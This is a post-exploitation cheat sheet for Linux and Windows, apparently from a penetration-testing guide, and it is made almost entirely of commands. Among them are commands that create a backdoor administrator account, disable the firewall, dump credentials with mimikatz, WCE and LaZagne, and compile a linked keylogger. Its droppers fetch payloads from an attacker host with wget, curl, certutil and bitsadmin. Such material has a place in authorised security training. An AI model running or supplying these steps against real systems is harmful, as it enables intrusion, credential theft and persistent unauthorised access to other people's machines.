Intro to Post Exploitation

Linux Post-exploitation

• Check wrong permissions:

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

Find files world writable:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

Look for interesting files:

find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null

Check sudo:

sudo su
sudo -l

Decrypt PKCS#12 objects:

openssl pkcs12 -info -in $FILE

Show certs in PKCS#7 file:

openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks

• Commands for information gathering:

ps -ef

mount

/sbin/ifconfig -a

route -n

cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d

cat /etc/exports

cat /etc/redhat* /etc/debian* /etc/*release

netstat -tanu

Find users with shell access:

egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services:

ls /etc/rc*

SSH relationships and logins:

cat ~/.ssh/*

References:

• https://payatu.com/guide-linux-privilege-escalation/

Tools:

• http://pentestmonkey.net/tools/audit/unix-privesc-check
• https://github.com/sleventyeleven/Linuxprivchecker
• https://github.com/rebootuser/LinEnum

Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

dir /A:H

dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt

Other checks:

DRIVERQUERY
wmic os where Primary='TRUE' reboot

List hotfixes:

wmic qfe

notepad myfile.txt:lion.txt
eventvwr.exe
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

Net commands:

net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr

Backdoor account:

net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

route print
arp -A
ipconfig /all
getmac

Show files attributes / permissions

cacls cmd.exe
attrib cmd.exe

List services:

sc queryex type=service state=all
net start

Other info:

systeminfo
whoami

Idem for Win XP:

echo %USERNAME%

• Firewall

netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off

netsh advfirewall set allprofiles state off

• RDP

Show RDP sessions:

quser
qwinsta
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
tasklist /svc /S servername/U username /P password

Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet)

msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

Change RDP port:

\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389

Remote Execution commands:

wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(windows/local/ps_wmi_exec) >

In the same host but with other role:

runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts

LaZagne

Download LaZagne from https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

RATs (Remote Administration Tools)

• Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Sniffers

Sniffers for Windows

Install Wireshark, also use in console dumpcap:

dumpcap -D
dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

• https://raw.githubusercontent.com/GiacomoLaw/Keylogger/master/windows/klog_main.cpp

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

Password dumping

mimikatz

mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv

Fgdump

Dumps hashes (needs SYSTEM privileges)

fgdump.exe

WCE (Windows Credential Editor)

Dumps clear passwords:

wce -w

Dumps hashes:

wce

Persistent, writes in credentials.txt:

wce -r

Change your credentials in memory:

wce -s

Droppers

Droppers are programs that allows you to download tools, trojans, etc to the target machine to follow the compromise locally.

Droppers using Linux

wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE [email protected]$IP:~

Droppers using Windows

Powershell

curl -Uri $URL

See also Powercat in the Powershell frameworks section.

ROBOCOPY

NET USE \\$IP\IPC$ /USER:DOMAIN\USER
ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z
NET USE \\$IP\IPC$ /D

BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE

Certutil

certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe

Notepad

notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows

Links:

• https://github.com/LOLBAS-Project/LOLBAS
• https://lolbas-project.github.io/
• https://gtfobins.github.io/
• https://github.com/Arno0x/CSharpScripts
• https://gist.github.com/jstangroome/9adaa87a845e5be906c8
• https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1

Examples:

hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:

csc.exe

Droppers Using known protocols

HTTP

Python2

python -m SimpleHTTPServer

python -m SimpleHTTPServer 80

Python3

python3 -m http.server 8080

Php

php -S localhost:8000

Ruby

ruby -run -e httpd . -p 8000

FTP

pip install pyftpdlib
python -m pyftpdlib

SMB

impacket-smbserver PAYLOADS /root/payload

As part of the post-exploitation part we can also perform Data Exfiltration.